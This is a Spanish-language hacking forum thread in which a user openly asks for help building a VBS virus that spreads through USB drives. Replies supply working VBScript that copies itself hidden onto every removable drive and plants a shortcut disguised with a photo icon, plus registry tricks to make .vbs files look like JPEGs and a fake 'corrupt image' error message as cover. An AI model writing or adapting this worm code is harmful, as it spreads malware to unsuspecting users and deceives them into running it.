Autor
|
Tema: [AYUDA][VBS] Pasar varios argumentos en un acceso directo (Leído 7,092 veces)
|
danny920825
|
Hola a todos los maestros del worm en vbs y a otros despiadados creadores de mis pesadillas en vbs. Vengo a pedir un consejo o una ayuda con un proyecto que tengo en mente. La verdad es que es un virus mas, pero para este caso, pienso hacer algo que es nuevo para mi, pero que no logro que me salga y no he visto en ningun manual. La idea es completar una de estas acciones
1- que el virus cambie el tradicional icono del pergamino por un JPG (esto lo vi en un virus hace un año, pero no pensaba entrar en este mundo cuando aquello). Se que se hace desde el registro. De este forma, no tengo que crear un metodo externo para que el virus se copie de las USB a las PC.
2-Este metodo es el posiblemente mas facil, pero ustedes diran: consiste en crear un acceso directo en el USb con un nombre irresistible con el icono de una foto o un video (supongo que deba funcionar lo del icono aunque la PC no tenga privilegios administrativos) y que en los parametros del acceso directo se ejecute mas de una opcion, las cuales serian: a) Copiar el virus para la PC b) Ejecutar el virus desde la PC c) Abrir la opcion engañosa que dice el acceso directo (Ej: Abrir una foto)
nota: el paso a) y b) del metodo 2, se pueden resumir en ejecutar el codigo desde el usb y el solo se copiaria a la pc.
Espero que me ayuden con esto. por cierto, me hablaron del codigo que generaba barrotes en la pantalla (como hacer algo parecido????)
|
|
|
En línea
|
"Los que reniegan de Dios es por desesperación de no encontrarlo". Miguel de Unamuno
|
|
|
Mad Antrax
|
Te lo muevo al foro de scripting.
Ahí te podrán ayudar mucho mejor. Elektro es un dios de los scripts xD
|
|
« Última modificación: 11 Marzo 2014, 09:54 am por ||MadAntrax|| »
|
En línea
|
No hago hacks/cheats para juegos Online. Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
|
|
|
Mad Antrax
|
Bueno, mientras te responden, te dejo una posible solución: On Error Resume Next Set WSS = CreateObject("WScript.Shell") Set FSO = CreateObject("Scripting.FileSystemObject") SpreadUSB Function SpreadUSB() for each drive in FSO.drives if drive.isready = true then if drive.freespace > 0 then if drive.drivetype = 1 then FSO.copyfile wscript.scriptfullname , drive.path & "\" & wscript.scriptname,true FSO.getfile(drive.path & "\" & wscript.scriptname).attributes = 2+4 set lnkobj = WSS.createshortcut (drive.path & "\mifoto.lnk") lnkobj.windowstyle = 7 lnkobj.targetpath = "cmd.exe" lnkobj.workingdirectory = "" lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit" lnkobj.iconlocation = WSS.regread ("HKEY_LOCAL_MACHINE\software\classes\jpegfile\defaulticon\") lnkobj.save() end if end if end if next End Function MsgBox "soy un virus"
Es un ejemplo muy sencillo: Busca todas las unidades del PC que sean extraibles. Si la unidad está disponible y con espacio... copia el script y lo oculta. Luego crea un acceso directo al script y le establece el icono de una foto. Lo que preguntas de copiar el virus al PC, añadir al registro y tal... es demasiado fácil como para volverlo a explicar. Te remito al tutorial de VBS que seguro resolverá tus otras dudas. http://foro.elhacker.net/scripting/tutorial_vbscript-t229032.0.htmlSaludos
|
|
« Última modificación: 11 Marzo 2014, 12:00 pm por ||MadAntrax|| »
|
En línea
|
No hago hacks/cheats para juegos Online. Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
|
|
|
79137913
Desconectado
Mensajes: 1.169
4 Esquinas
|
HOLA!!!
Buen codigo, yo cambiaria el msgbox del final por un vbCritical con "Imagen Corrupta, &H89BA3D7E No se puede READ."
GRACIAS POR LEER!!!
|
|
|
En línea
|
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!" "La peor de las ignorancias es no saber corregirlas"
79137913 *Shadow Scouts Team*
|
|
|
Mad Antrax
|
|
|
|
En línea
|
No hago hacks/cheats para juegos Online. Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
|
|
|
Eleкtro
Ex-Staff
Desconectado
Mensajes: 9.878
|
Ya te solucionaron el punto 2, respondiendo al punto 1 e diré que: Solo tienes que modificar el icono del tipo de archivo registrado como 'VBSFile': HKEY_CLASSES_ROOT\VBSFile\DefaultIcon Por el icono del tipo de archivo registrado como 'jpegfile': HKEY_CLASSES_ROOT\jpegfile\DefaultIcon Pero, óbviamente, este cambio requiere de un reinicio o relogueo del usuario actual. Otra forma de cambiar el icono, de forma permanente e inmediata, sería usar una utilidad (Ej: ExeScript Editor) para 'compilar' el archivo VBS en un EXE, y modificar el icono del archivo executable. Saludos
|
|
« Última modificación: 11 Marzo 2014, 14:35 pm por Eleкtro »
|
En línea
|
|
|
|
|
danny920825
|
El Ejemplo esta Genial, ya he visto varios codigos asi, pero lo que quiero hacer es un pokito mas complicado. Es que cuando el usuario haga clic en el acceso directo suceda algo asi
[code = vb]
Set objshell = CreateObject("WScript.Shell") Set objfso= CreateObject("Scripting.FileSystemObject")
'Cuando el usuario clickee ocurriria esto
objfso.copyfile wscript.scriptname,"c:\mivirus",true objfso.copyfile wscript.scriptname, "d:\",true objshell.run "mifoto.jpg"
No se si deje claro el ejemplo pero lo que quiero hacer es colocar mas de una instruccion en el acceso directo, porque otra buena idea seria crear un segundo codigo que seria el que hiciera todo lo demas. Pero es que me gustaria hacerlo con un mismo codigo ¿Me hago entender o quieres que haga mi intento por poner un ejemplo?
|
|
|
En línea
|
"Los que reniegan de Dios es por desesperación de no encontrarlo". Miguel de Unamuno
|
|
|
danny920825
|
Hello otra vez, me discupo por no probar las cosas antes de decir que no. El ejemplo no lo pude probar porque el KAV me lo elimina al momento y no tengo el pass para cerrarlo jaja. Lo cierto es que la base es el & delante del comando yo estaba probando algo asi "cmd.exe /c start notepad.exe" & chr(13) & chr(10) & "start calc.exe" asi intentaba ejecutar el bloc de notas, insertar un retorno de carrito y intentaba ejecutar despues la calculadora, pero solo se ejecutaba el bloc de notas. Bien para aquellos que ven en esto la posibilidad interminable de herramientas desde accesos directos, pues he aki la solucion lineal gracias a ||MadAntrax|| : "cmd.exe /c start notepad.exe" & "&start explorer " & "&exit" Gracias a todos. Y si no hay ninguna duda sobre el tema... ¡Moderador! TEMA CERRADO
|
|
|
En línea
|
"Los que reniegan de Dios es por desesperación de no encontrarlo". Miguel de Unamuno
|
|
|
Eleкtro
Ex-Staff
Desconectado
Mensajes: 9.878
|
"cmd.exe /c start notepad.exe" & "&start explorer " & "&exit" La sintaxis es erronea, y, en este caso te está funcionando, pero deberías encerrar los argumentos del proceso (CMD) y también de los comandos, si te importa la integridad del código y no quieres obtener errores en el futuro (como por ejemplo no poder ejecutar proces que tengan espacio en el nombre): Entonces así es como debe quedar literálmente: "CMD.exe" /C " start "" "notepad.exe" & start "" "explorer.exe" " El Script en VBS: Const StartQuote = " "" " Const EndQuote = " """ Const Quote = """" Const Quotes = " """" " Set WSS = WScript.CreateObject("WScript.Shell") WSS.run WSS.ExpandEnvironmentStrings("""%ComSpec%""" & " /C ") & _ StartQuote & _ "start" & Quotes & Quote & "notepad.exe" & Quote & _ " & " & _ "start" & Quotes & Quote & "explorer.exe" & Quote & _ EndQuote
Saludos
|
|
« Última modificación: 15 Marzo 2014, 12:09 pm por Eleкtro »
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
pasar argumentos por un CreateThread?
« 1 2 »
Programación C/C++
|
while
|
11
|
9,830
|
14 Octubre 2010, 23:41 pm
por Eternal Idol
|
|
|
consulta sobre pasar varios argumentos a un ejecutable de un textbox
.NET (C#, VB.NET, ASP)
|
ahaugas
|
3
|
3,044
|
12 Enero 2013, 13:56 pm
por ahaugas
|
|
|
Problema con Threads al pasar un dato mediante argumentos
Java
|
AlterMundis
|
2
|
2,900
|
23 Enero 2013, 22:50 pm
por AlterMundis
|
|
|
MOVIDO: [AYUDA][VBS] Pasar varios argumentos en un acceso directo
Análisis y Diseño de Malware
|
Mad Antrax
|
0
|
2,099
|
11 Marzo 2014, 09:51 am
por Mad Antrax
|
|
|
Ayuda con Virus de Acceso Directo
Seguridad
|
BanBanneo
|
2
|
3,174
|
20 Mayo 2018, 12:07 pm
por BanBanneo
|
|